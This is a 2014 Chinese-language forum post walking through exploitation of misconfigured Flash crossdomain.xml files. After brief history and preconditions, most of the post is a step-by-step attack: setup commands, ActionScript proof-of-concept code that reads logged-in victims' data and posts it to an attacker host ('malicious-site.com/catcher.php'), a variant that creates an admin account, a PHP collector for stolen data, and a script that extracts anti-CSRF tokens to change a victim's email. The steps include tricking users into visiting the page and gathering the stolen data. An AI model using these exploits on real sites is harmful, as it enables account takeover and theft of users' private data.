设为首页收藏本站

安而遇随-随遇而安

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 1519|回复: 0

crossdomain.xml文件配置不当利用手法

[复制链接]

 成长值: 50620

发表于 2014-7-3 01:02 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?立即注册

x
crossdomain.xml文件配置不当利用手法

不恰当的crossdomain.xml配置对存放了敏感信息的域来说是具有很大风险的。可能导致敏感信息被窃取和请求伪造。攻击者不仅仅可以发送请求,还可以读取服务器返回的信息。这意味着攻击者可以获得已登录用户可以访问的任意信息,甚至获得anti-csrf token。

追溯历史:

这是一个很古老的漏洞了。有多老呢,已经有8年了。在计算机领域,8年真的很长很长了。下面是一个粗略的crossdomian.xml漏洞的时间表。

2006: Chris Shiflett,Julien Couvreur, 和 Jeremiah Grossman 开始公开讨论这个漏洞.
2008: Jeremiah Grossman 再一次分析这个问题
2010: Erlend Ofedel和  Mike Bailey 在Blackhat DC上演讲这个议题。

2011: FORTH-ICS, SAP Research, 和 UC San Diego 都发布了关于crossdomain.xml的研究报告和错误配置可能引起的安全风险。

虽然这个问题在06年就提出来了。在11年的时候有了好几个优秀的paper来研究这个问题。但是这个漏洞从来没有引起足够的重视。下面是2014年3月google相关的关键字时可以搜索到的信息。

对于crossdomain.xml配置不当的危害很多文章已经说的很清楚了。可是如何利用这个漏洞,怎样写一个exploit来证明漏洞确一直没有很好的资料。直到2013年8月Gursev Kalra写了一篇博客并分享了他的利用代码

漏洞分析:

笼统来说,如果一个站点符合下面3个条件,就会存在crossdomain.xml引起的安全风险。

1,一个站点的根节点下存在crossdomain.xml文件。比如:www.freebuf.com/crossdomain.xml.

2,crossdomain.xml的配置是过度授权的,比如本文开头截图中的配置。

3,目标站点:freebuf.com上存在敏感数据或者可以在目标站点上执行一些敏感操作。

如果目标站点满足条件1和2,但是对方没有存储敏感信息,也不能执行一些敏感的操作。那么配置不当的crossdomain.xml也引起不了严重的危害。但是如果目标站点存在敏感信息或者具备敏感操作。那么不恰当的配置就相当于对任意站点上的恶意SWF敞开了大门。举个例子。这时候,一个www.fake-freebuf.com域下的swf可以绕过同源策略,访问www.freebuf.com域上一个授权用户可以访问的任意 信息。

漏洞利用:

终于来到最有意思的部分了。首先配置测试环境。下面是在kali linux 下配置mxmlc的环境。用来编译swf。如果你是windows系统可以直接下载flex sdk。已经有flash开发环境的同学可以略过这部分。

1,安装adobe flex:

  1. <font color="rgb(102, 102, 102)"><font face="微软雅黑,">apt-get install openjdk-6-jdk
  2. mkdir /opt/flex
  3.   /opt/flex/
  4. wget http://download.macromedia.com/pub/flex/sdk/flex_sdk_4.6.zip
  5. unzip flex_sdk_4.6.zip
  6. chmod -R a+rx /opt/flex/   >> ~/.bashrc
  7. chmod 755 bin/mxmlc</font></font>
复制代码
2,获取

  1. <font color="rgb(102, 102, 102)"><font face="微软雅黑,">mkdir /var/www/crossdomain
  2. mkdir ~/crossdomain  ~
  3. git clone https://github.com/gursev/flash-xdomain-xploit.git
  4. cp flash-xdomain-xploit/xdx.html /var/www/crossdomain/
  5. cp flash-xdomain-xploit/XDomainXploit.as ~/crossdomain/
  6. vi ~/crossdomain/XDomainXploit.as</font></font>
复制代码
如果没有安装git的话,可以使用wget下载:

  1. <font color="rgb(102, 102, 102)"><font face="微软雅黑,">/var/www/crossdomain
  2. wget https://raw.github.com/gursev/flash-xdomain-xploit/master/xdx.html  
  3.   ~/crossdomain
  4. wget https://raw.github.com/gursev/flash-xdomain-xploit/master/XDomainXploit.as
  5. vi ~/crossdomain/XDomainXploit.as</font></font>
复制代码
3,修改actionscript,满足自己的需求。对于简单的get请求如下,只需要修改自己的victim URL和attacker URL。使用粗体标出。
  1. // POC Author: Gursev Singh Kalra ([email protected])// XDomainXploit.aspackage { import flash.display.Sprite;

  2. import flash.events.*;

  3. import flash.net.URLRequestMethod;

  4. import flash.net.URLRequest;

  5. import flash.net.URLLoader;
  6. public class XDomainXploit extends Sprite {  public function
  7. XDomainXploit() {   // Target URL from where the data is to be retrieved

  8.    var readFrom:String = "http://www.secret-site.com/account/info";

  9.    var readRequest:URLRequest = new URLRequest(readFrom);   var getLoader:URLLoader = new URLLoader();

  10.    getLoader.addEventListener(Event.COMPLETE, eventHandler);   try {

  11.     getLoader.load(readRequest);

  12.    } catch (error:Error) {    trace("Error loading URL: " + error);

  13.    }

  14.   }  private function eventHandler(event:Event):void {   // URL to which retrieved data is to be sent

  15.    var sendTo:String = "http://malicious-site.com/catcher.php"

  16.    var sendRequest:URLRequest = new URLRequest(sendTo);

  17.    sendRequest.method = URLRequestMethod.POST;

  18.    sendRequest.data = event.target.data;

  19.    var sendLoader:URLLoader = new URLLoader();   try {

  20.     sendLoader.load(sendRequest);

  21.    } catch (error:Error) {    trace("Error loading URL: " + error);

  22.    }

  23.   }

  24. }
  25. }
复制代码
如果需要发送post请求,并修改http header的话,可以使用下面的代码。
  1. // POC Author: Gursev Singh Kalra ([email protected])// POC
  2. Modified to send POSTs and append HTTP headers: Seth Art//
  3. XDomainXploit.aspackage { import flash.display.Sprite;

  4. import flash.events.*;

  5. import flash.net.URLRequestMethod;

  6. import flash.net.URLRequest;

  7. import flash.net.URLLoader;

  8. import flash.net.URLRequestHeader;

  9. public class XDomainXploit3 extends Sprite {  public function
  10. XDomainXploit3() {   // Target URL from where the data is to be
  11. retrieved

  12.    var readFrom:String = "https://www.secret-site.com/admin/add";

  13.    var header:URLRequestHeader = new URLRequestHeader("Content-Type", "text/plain; charset=UTF-8");

  14.    var readRequest:URLRequest = new URLRequest(readFrom);   readRequest.method = URLRequestMethod.POST

  15.    readRequest.data =
  16. "{"name":"CSRF-Admin","Group":"admin","password":"password","confirmPassword":"password"}";

  17.    readRequest.requestHeaders.push(header);

  18.    var getLoader:URLLoader = new URLLoader();

  19.    getLoader.addEventListener(Event.COMPLETE, eventHandler);   try {

  20.     getLoader.load(readRequest);

  21.    } catch (error:Error) {    trace("Error loading URL: " + error);

  22.    }

  23.   }  private function eventHandler(event:Event):void {   // URL to which retrieved data is to be sent

  24.    var sendTo:String = "http://www.malicious-site.com/crossdomain/catcher.php"

  25.    var sendRequest:URLRequest = new URLRequest(sendTo);

  26.    sendRequest.method = URLRequestMethod.POST;

  27.    sendRequest.data = event.target.data;

  28.    var sendLoader:URLLoader = new URLLoader();   try {

  29.     sendLoader.load(sendRequest);

  30.    } catch (error:Error) {    trace("Error loading URL: " + error);

  31.    }

  32.   }

  33. }
  34. }
复制代码
4,使用mxmlc编译actionscript。
  1. /opt/flex/bin/mxmlc ~/crossdomain/
复制代码
5,将swf文件放在自己的web目录下.
  1. mv ~/crossdomain/XDomainXploit.swf /var/www/crossdomain
复制代码
6,创建用来接受敏感信息的文件。
vi /var/www/catcher.php
  1. <?php

  2. $data = file_get_contents("php://input");
  3. $ret = file_put_contents('/tmp/thanks_for_sharing.txt', $data, FILE_APPEND | LOCK_EX);
  4. if($ret === false) {
  5. die('Error writing to file');
  6. }
  7. else {
  8. echo "$ret bytes written to file";
  9. }
  10. ?>
复制代码
7,如果没有php环境的话需要安装php。
  1. apt-get install php5
复制代码
8,设置服务器支持ssl。
这步不是必须的。但是在 secure="false"没有设置的话,我们就只能从https网站加载swf了。
下面的命令是。更奢侈的伪装是买一个有效的证书,这样用户就不会收到ssl 错误的提示了。
  1. make-ssl-cert generate-default-snakeoil --force-overwrite
  2. a2enmod ssl
  3. a2ensite default-ssl
复制代码
9,启动或者重启web服务器。
  1. /etc/init.d/apache2 restart
复制代码
10,欺骗用户访问恶意网站:
11,祈祷你的目标用户处于登陆状态。
12,收集和分析你窃取到的数据
  1. cat /tmp/thanks_for_sharing.txt
复制代码
上面两个poc的功能都是窃取数据,在分析crossdomain.xml配置不当危害的时候,我们提到某些场景可以获取到anti-csrf token来绕过csrf防御。下面是一段在真实的网站中使用的代码,先是通过访问含有csrf token的页面,从返回信息中获取到token,再发送更改绑定邮箱的请求。
  1. // Original POC Author: Gursev Singh Kalra ([email protected])// Modified to bypass antiCSRF tokens: Seth Art ([email protected])// BypassCSRFchangeEmailAddress.aspackage {
  2. import flash.display.Sprite;
  3. import flash.events.*;
  4. import flash.net.URLRequestMethod;
  5. import flash.net.URLRequest;
  6. import flash.net.URLLoader;

  7. public class BypassCSRFchangeEmailAddress extends Sprite {
  8.   public function BypassCSRFchangeEmailAddress() {
  9.    // Target URL from where the data is to be retrieved
  10.    var readFrom:String = "https://www.secret-site.com/account/edit";
  11.    var readRequest:URLRequest = new URLRequest(readFrom);
  12.    var getLoader:URLLoader = new URLLoader();
  13.    getLoader.addEventListener(Event.COMPLETE, eventHandler);
  14.    try {
  15.     getLoader.load(readRequest);
  16.    } catch (error:Error) {
  17.     trace("Error loading URL: " + error);
  18.    }
  19.   }


  20.   private function eventHandler(event:Event):void {
  21.    // This assigns the reponse from the first

  22.    // request to "reponse". The antiCSRF token is
  23.    // somwhere in this reponse
  24.    var response:String = event.target.data;

  25.    // This line looks for the line in the response

  26.    //that contains the CSRF token
  27.    var CSRF:Array = response.match(/CSRFToken.*/);

  28.    // This line extracts the value of the CSRF token,

  29.    // and assigns it to "token"
  30.    var token:String = CSRF[0].split(""")[2];

  31.    // These next two lines create the prefix and the

  32.    // suffix for the POST request
  33.    var prefix:String = "CSRFToken="
  34.    var suffix:String = "&first_name=CSRF&last_name=CSRF&email=sethsec%40gmail.com"

  35.    // This section sets up a new URLRequest object and

  36.    // sets the method to post   
  37.    var sendTo:String = "https://www.secret-site.com/account/edit/"
  38.    var sendRequest:URLRequest = new URLRequest(sendTo);
  39.    sendRequest.method = URLRequestMethod.POST;

  40.    // This next line sets the data portion of the POST

  41.                         // request to the "prefix" + "token" + "suffix"
  42.    sendRequest.data = prefix.concat(token,suffix)
  43.    
  44.    // Time to create the URLLoader object and send the

  45.    // POST request containing the CSRF token
  46.    var sendLoader:URLLoader = new URLLoader();
  47.    try {
  48.     sendLoader.load(sendRequest);
  49.    } catch (error:Error) {
  50.     trace("Error loading URL: " + error);
  51.    }
  52.   }
  53. }
复制代码







随遇而安
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表